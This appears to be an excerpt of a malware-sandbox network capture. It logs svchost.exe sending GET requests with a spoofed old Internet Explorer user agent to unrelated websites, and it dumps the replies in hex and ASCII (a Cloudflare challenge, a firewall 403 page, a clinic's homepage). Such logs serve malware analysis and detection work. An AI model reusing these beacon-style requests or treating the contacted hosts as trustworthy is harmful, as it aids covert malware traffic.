6vrPHaiQwcnylD7Y1bvmPjqRo_mp-5kKY80Wa5rfn8ZXyUyfTp-nzvtMtuK8mBBm3GV_MxHvQV5Yv8HyJ-b1JuBrNOGnAgsYoy4JdcXJTYuyVVUcWTsts1WTzOdq8ZZHh8lwfNeh-yYpUy9qTaIWYs_L0K3GNpLoPXtzbrBmoYYx78_0aeiSJtWt3qH0bl7ey4OJELvtjIjAX-LL8Hny9UNyknohWd8Wxd0aMtB3fOnYYjP51-XDU3Om3ErP4tv
2023-03-22 04:44:27 UTC	58	IN	Data Raw: 6f 6e 65 3a 20 27 73 69 67 74 6f 61 2e 63 6f 6d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 54 79 70 65 3a 20 27 6d 61 6e 61 67 65 64 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 4e 6f 75 6e 63 65 3a 20 27 34 38 34 30 39 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 52 61 79 3a 20 27 37 61 62 62 63 37 39 31 34 38 30 33 33 36 30 63 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 48 61 73 68 3a 20 27 62 30 31 33 63 63 31 62 61 36 34 66 61 35 64 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 55 50 4d 44 54 6b 3a 20 22 5c 2f 3f 5f 5f 63 66 5f 63 68 6c 5f 74 6b 3d 48 4d 49 48 33 32 5f 59 4b 5a 33 32 50 5f 67 47 53 70 49 4f 75 78 2e 42 4c 55 4a 32 6d 56 50 66 42 39 4a 68 79 66 69 5f 70 79 51 2d 31 36 37 39 34 36 30 32 36 37 2d 30 2d 67 61 4e 79 63 47 Data Ascii: one: 'sigtoa.com', cType: 'managed', cNounce: '48409', cRay: '7abbc7914803360c', cHash: 'b013cc1ba64fa5d', cUPMDTk: "\/?__cf_chl_tk=HMIH32_YKZ32P_gGSpIOux.BLUJ2mVPfB9Jhyfi_pyQ-1679460267-0-gaNycG
2023-03-22 04:44:27 UTC	59	IN	Data Raw: 4e 4a 78 36 4d 49 31 54 46 62 6b 30 56 6b 71 61 6a 4f 6c 6a 65 58 55 32 70 64 35 52 72 64 67 35 63 71 74 48 63 55 3d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 31 3a 20 27 58 35 39 66 61 56 57 68 5a 42 61 77 35 71 43 41 79 59 71 5a 4f 51 3d 3d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 32 3a 20 27 69 56 6a 38 49 4c 30 48 6f 45 51 49 78 51 36 52 36 52 79 4f 6c 51 3d 3d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7a 68 3a 20 27 64 4c 68 39 34 5a 58 4c 73 4d 61 54 6f 47 44 33 2f 71 39 42 69 75 6d 61 63 36 79 78 51 56 55 5a 34 63 32 6a 74 34 59 4a 6e 61 55 3d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 75 68 3a 20 27 66 78 75 35 2f 69 51 76 50 2f 7a 6e 41 4c 39 38 63 46 50 70 7a 30 44 6a 72 6d 45 33 Data Ascii: NJx6MI1TFbk0VkqajOljeXU2pd5Rrdg5cqtHcU=', i1: 'X59faVWhZBaw5qCAyYqZOQ==', i2: 'iVj8IL0HoEQIxQ6R6RyOlQ==', zh: 'dLh94ZXLsMaToGD3/q9Biumac6yxQVUZ4c2jt4YJnaU=', uh: 'fxu5/iQvP/znAL98cFPpz0DjrmE3
2023-03-22 04:44:27 UTC	60	IN	Data Raw: 78 2e 42 4c 55 4a 32 6d 56 50 66 42 39 4a 68 79 66 69 5f 70 79 51 2d 31 36 37 39 34 36 30 32 36 37 2d 30 2d 67 61 4e 79 63 47 7a 4e 43 4f 55 22 20 2b 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 63 4f 67 55 48 61 73 68 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 70 6f 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 69 73 74 6f 72 79 2e 72 65 70 6c 61 63 65 53 74 61 74 65 28 6e 75 6c 6c 2c 20 6e 75 6c 6c 2c 20 6f 67 55 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 27 68 65 61 64 27 29 5b 30 5d 2e 61 70 70 65 6e 64 43 Data Ascii: x.BLUJ2mVPfB9Jhyfi_pyQ-1679460267-0-gaNycGzNCOU" + window._cf_chl_opt.cOgUHash); cpo.onload = function() { history.replaceState(null, null, ogU); }; } document.getElementsByTagName('head')[0].appendC
2023-03-22 04:44:27 UTC	61	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
30	192.168.2.5	62419	185.237.66.112	443	C:\Windows\SysWOW64\svchost.exe

Timestamp	kBytes transferred	Direction	Data
2023-03-22 04:45:06 UTC	348	OUT	GET / HTTP/1.1 Accept: * Accept-Language: en-us Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Cache-Control: no-cache Host: techtrans.de
2023-03-22 04:45:06 UTC	348	IN	HTTP/1.1 403 Forbidden Date: Wed, 22 Mar 2023 04:45:06 GMT Server: Apache Pragma: no-cache Cache-Control: no-cache, no-store, must-revalidate Expires: 0 X-XSS-Protection: 1; mode=block Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2023-03-22 04:45:06 UTC	349	IN	Data Raw: 32 64 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 69 6e 6a 61 46 69 72 65 77 61 6c 6c 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 2f 68 65 61 64 3e 3c Data Ascii: 2de<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>NinjaFirewall 403 Forbidden</title><style>body{font-family:sans-serif;font-size:13px;color:#000;}</style><meta http-equiv="Content-Type" content="text/html; charset=utf-8"></head><

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
31	192.168.2.5	62424	172.67.164.178	443	C:\Windows\SysWOW64\svchost.exe

Timestamp	kBytes transferred	Direction	Data
2023-03-22 04:45:06 UTC	348	OUT	GET / HTTP/1.1 Accept: * Accept-Language: en-us Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Cache-Control: no-cache Host: clinicasanluis.com.co
2023-03-22 04:45:07 UTC	632	IN	HTTP/1.1 200 OK Date: Wed, 22 Mar 2023 04:45:07 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Expires: Wed, 17 Aug 2005 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Set-Cookie: d55e479f054c94814cbc10d217aaa990=1d3ede42cc885cee40835e91a67860f7; path=/; HttpOnly Last-Modified: Wed, 22 Mar 2023 04:45:07 GMT CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=RB8mUypZQERhPP5XRQggwhNnUpRAgNpc8JEomI3Qagg4HfVUDhsXUzxKb4LP7nnuDGmrLWuGc7LapLorTkvfpyhjfBOne2nUmo9mniygxQbh0vMnJ%2BQKaLjyMksKko0O4nTC8yJJ6t8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7abbc885bcad90fa-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
2023-03-22 04:45:07 UTC	633	IN	Data Raw: 37 63 35 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 2d 45 53 22 20 64 69 72 3d 22 6c 74 72 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 3c 62 61 73 65 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6c 69 6e 69 63 61 73 61 6e 6c 75 69 73 2e 63 6f 6d 2e 63 6f 2f 22 20 Data Ascii: 7c54<!DOCTYPE html><html lang="es-ES" dir="ltr"><head><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta charset="utf-8" /><base href="https://clinicasanluis.com.co/"
2023-03-22 04:45:07 UTC	633	IN	Data Raw: 22 2f 70 6c 75 67 69 6e 73 2f 73 79 73 74 65 6d 2f 72 6f 6b 62 6f 78 2f 61 73 73 65 74 73 2f 73 74 79 6c 65 73 2f 72 6f 6b 62 6f 78 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 6d 6f 64 75 6c 65 73 2f 6d 6f 64 5f 70 6f 70 75 70 61 68 6f 6c 69 63 2f 63 73 73 2f 6a 71 75 65 72 79 2e 67 61 66 61 6e 63 79 62 6f 78 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 61 73 73 65 74 73 2f 63 73 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 6d 65 64 69 Data Ascii: "/plugins/system/rokbox/assets/styles/rokbox.css" rel="stylesheet" /><link href="/modules/mod_popupaholic/css/jquery.gafancybox.min.css" rel="stylesheet" /><link href="/media/gantry5/assets/css/font-awesome.min.css" rel="stylesheet" /><link href="/medi
2023-03-22 04:45:07 UTC	634	IN	Data Raw: 73 79 73 74 65 6d 2f 6a 73 2f 63 6f 72 65 2e 6a 73 3f 39 38 39 64 61 34 36 34 36 61 31 61 30 64 66 66 66 39 61 35 36 38 35 66 62 36 65 65 33 36 64 61 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 73 79 73 74 65 6d 2f 6a 73 2f 6d 6f 6f 74 6f 6f 6c 73 2d 63 6f 72 65 2e 6a 73 3f 39 38 39 64 61 34 36 34 36 61 31 61 30 64 66 66 66 39 61 35 36 38 35 66 62 36 65 65 33 36 64 61 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 73 79 73 74 65 6d 2f 6a 73 2f 6d 6f 6f 74 6f 6f 6c 73 2d 6d 6f 72 65 2e 6a 73 3f 39 38 39 64 61 34 36 34 36 61 31 61 30 64 66 66 66 39 61 35 36 38 35 66 62 36 65 65 33 36 64 61 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 Data Ascii: system/js/core.js?989da4646a1a0dfff9a5685fb6ee36da"></script><script src="/media/system/js/mootools-core.js?989da4646a1a0dfff9a5685fb6ee36da"></script><script src="/media/system/js/mootools-more.js?989da4646a1a0dfff9a5685fb6ee36da"></script><script src
2023-03-22 04:45:07 UTC	636	IN	Data Raw: 6d 6c 35 73 68 69 76 2d 70 72 69 6e 74 73 68 69 76 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 65 6e 67 69 6e 65 73 2f 6e 75 63 6c 65 75 73 2f 63 73 73 2f 6e 75 63 6c 65 75 73 2d 69 65 39 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 61 73 73 65 74 73 2f 6a 73 2f 6d 61 74 63 68 6d 65 64 69 61 2e 70 6f 6c 79 66 69 6c 6c 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 3c Data Ascii: ml5shiv-printshiv.min.js"></script> <link rel="stylesheet" href="/media/gantry5/engines/nucleus/css/nucleus-ie9.css" type="text/css"/> <script type="text/javascript" src="/media/gantry5/assets/js/matchmedia.polyfill.js"></script> <
2023-03-22 04:45:07 UTC	637	IN	Data Raw: 69 63 61 2f 6c 6f 67 6f 5f 68 6f 72 69 7a 6f 6e 74 61 6c 2e 70 6e 67 22 20 61 6c 74 3d 22 43 6c 69 6e 69 63 61 20 53 61 6e 20 4c 75 69 73 22 20 2f 3e 0a 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 36 33 22 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 65 6e 75 2d 38 36 30 35 2d 70 61 72 74 69 63 6c 65 22 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 20 67 2d 70 61 72 74 69 63 6c 65 22 3e 20 3c 6e 61 76 20 63 6c 61 73 73 3d 22 67 2d 6d 61 69 6e 2d 6e 61 76 22 20 72 6f 6c 65 3d 22 6e 61 76 69 67 61 74 69 6f 6e 22 20 64 61 74 61 2d 67 2d 68 6f 76 65 72 2d 65 78 70 61 6e 64 3d 22 74 72 75 65 22 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 67 2d 74 6f 70 6c 65 76 65 6c 22 3e 0a 3c 6c Data Ascii: ica/logo_horizontal.png" alt="Clinica San Luis" /></a></div></div><div class="g-block size-63"><div id="menu-8605-particle" class="g-content g-particle"> <nav class="g-main-nav" role="navigation" data-g-hover-expand="true"><ul class="g-toplevel"><l
2023-03-22 04:45:07 UTC	638	IN	Data Raw: 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 23 22 20 64 61 74 61 2d 67 2d 6d 65 6e 75 70 61 72 65 6e 74 3d 22 22 3e 3c 73 70 61 6e 3e 42 61 63 6b 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 32 31 35 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 73 6f 6d 6f 73 2d 65 73 70 65 63 69 61 6c 69 73 74 61 73 2f 65 71 75 69 70 6f 2d 6d 65 64 69 63 6f 2f 70 65 64 69 61 74 72 61 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 Data Ascii: -container" href="#" data-g-menuparent=""><span>Back</span></a></li><li class="g-menu-item g-menu-item-type-component g-menu-item-215 "><a class="g-menu-item-container" href="/index.php/somos-especialistas/equipo-medico/pediatras"><span class="g-menu
2023-03-22 04:45:07 UTC	640	IN	Data Raw: 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 45 73 70 65 63 69 61 6c 69 64 61 64 65 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 73 65 70 61 72 61 74 6f 72 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 31 31 30 20 67 2d 70 61 72 65 6e 74 20 67 2d 73 74 61 6e 64 61 72 64 20 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 64 Data Ascii: nu-item-content"><span class="g-menu-item-title">Especialidades</span></span></a></li></ul></div></div></li></ul></li><li class="g-menu-item g-menu-item-type-separator g-menu-item-110 g-parent g-standard "><div class="g-menu-item-container" d
2023-03-22 04:45:07 UTC	641	IN	Data Raw: 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 70 6f 6c 69 74 69 63 61 73 2d 69 6e 73 74 69 74 75 63 69 6f 6e 61 6c 65 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 50 6f 6c c3 ad 74 69 63 61 73 20 69 6e 73 74 69 74 75 63 69 6f 6e 61 6c 65 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 31 31 35 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f Data Ascii: stra-clinica/politicas-institucionales"><span class="g-menu-item-content"><span class="g-menu-item-title">Polticas institucionales</span></span></a></li><li class="g-menu-item g-menu-item-type-component g-menu-item-115 "><a class="g-menu-item-co
2023-03-22 04:45:07 UTC	642	IN	Data Raw: 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 6e 75 65 73 74 72 6f 73 2d 70 61 63 69 65 6e 74 65 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 50 61 63 69 65 6e 74 65 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 70 61 72 65 6e 74 2d 69 6e 64 69 63 61 74 6f 72 22 20 64 61 74 61 2d 67 2d 6d 65 6e 75 70 61 72 65 6e 74 3d 22 22 3e 3c 2f 73 70 61 6e 3e 20 3c 2f 61 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 67 2d 64 72 6f 70 64 6f 77 6e Data Ascii: item-container" href="/index.php/nuestra-clinica/nuestros-pacientes"><span class="g-menu-item-content"><span class="g-menu-item-title">Pacientes</span></span><span class="g-menu-parent-indicator" data-g-menuparent=""></span> </a><ul class="g-dropdown
2023-03-22 04:45:07 UTC	644	IN	Data Raw: 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 33 39 36 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 6e 75 65 73 74 72 6f 73 2d 70 61 63 69 65 6e 74 65 73 2f 65 64 75 63 61 63 69 6f 6e 2d 79 2d 70 72 6f 6d 6f 63 69 6f 6e 2d 70 61 72 61 2d 6c 61 2d 64 6f 6e 61 63 69 6f 6e 2d 64 65 2d 6f 72 67 61 6e 6f 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 Data Ascii: "g-menu-item g-menu-item-type-component g-menu-item-396 "><a class="g-menu-item-container" href="/index.php/nuestra-clinica/nuestros-pacientes/educacion-y-promocion-para-la-donacion-de-organos"><span class="g-menu-item-content"><span class="g-menu-ite
2023-03-22 04:45:07 UTC	645	IN	Data Raw: 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 53 49 43 4f 46 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 33 38 34 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 69 6e 64 69 63 61 64 6f 72 65 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 Data Ascii: <span class="g-menu-item-title">SICOF</span></span></a></li><li class="g-menu-item g-menu-item-type-component g-menu-item-384 "><a class="g-menu-item-container" href="/index.php/nuestra-clinica/indicadores"><span class="g-menu-item-content"><span
2023-03-22 04:45:07 UTC	646	IN	Data Raw: 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 45 73 63 72 c3 ad 62 65 6e 6f 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 32 33 31 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6e 74 61 63 74 6f 2f 64 69 72 65 63 74 6f 72 69 6f 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e Data Ascii: m-content"><span class="g-menu-item-title">Escrbenos</span></span></a></li><li class="g-menu-item g-menu-item-type-component g-menu-item-231 "><a class="g-menu-item-container" href="/index.php/contacto/directorio"><span class="g-menu-item-conten
2023-03-22 04:45:07 UTC	648	IN	Data Raw: 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 33 38 35 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6e 74 61 63 74 6f 2f 63 6f 70 61 73 73 74 2d 32 30 32 30 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 43 4f 50 41 53 53 54 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 Data Ascii: </a></li><li class="g-menu-item g-menu-item-type-component g-menu-item-385 "><a class="g-menu-item-container" href="/index.php/contacto/copasst-2020"><span class="g-menu-item-content"><span class="g-menu-item-title">COPASST</span></span></a></li
2023-03-22 04:45:07 UTC	649	IN	Data Raw: 65 6c 20 6d 61 c3 b1 61 6e 61 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 6c 61 74 66 6f 72 6d 2d 63 6f 6e 74 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 6f 64 75 6c 65 74 61 62 6c 65 20 22 3e 0a 3c 73 74 79 6c 65 3e 0d 0a 2e 67 61 66 61 6e 63 79 62 6f 78 2d 6c 6f 63 6b 20 7b 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 0d 0a 2e 67 61 66 61 6e 63 79 62 6f 78 2d 69 6e 6e 65 72 20 7b 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 0d 0a 23 67 61 66 61 6e 63 79 62 6f 78 2d 6f 76 65 72 6c 61 79 33 37 39 20 7b 0d 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 31 32 29 3b 0d Data Ascii: el maana</div></div> </div><div class="platform-content"><div class="moduletable "><style>.gafancybox-lock {overflow: hidden !important;}.gafancybox-inner {overflow: 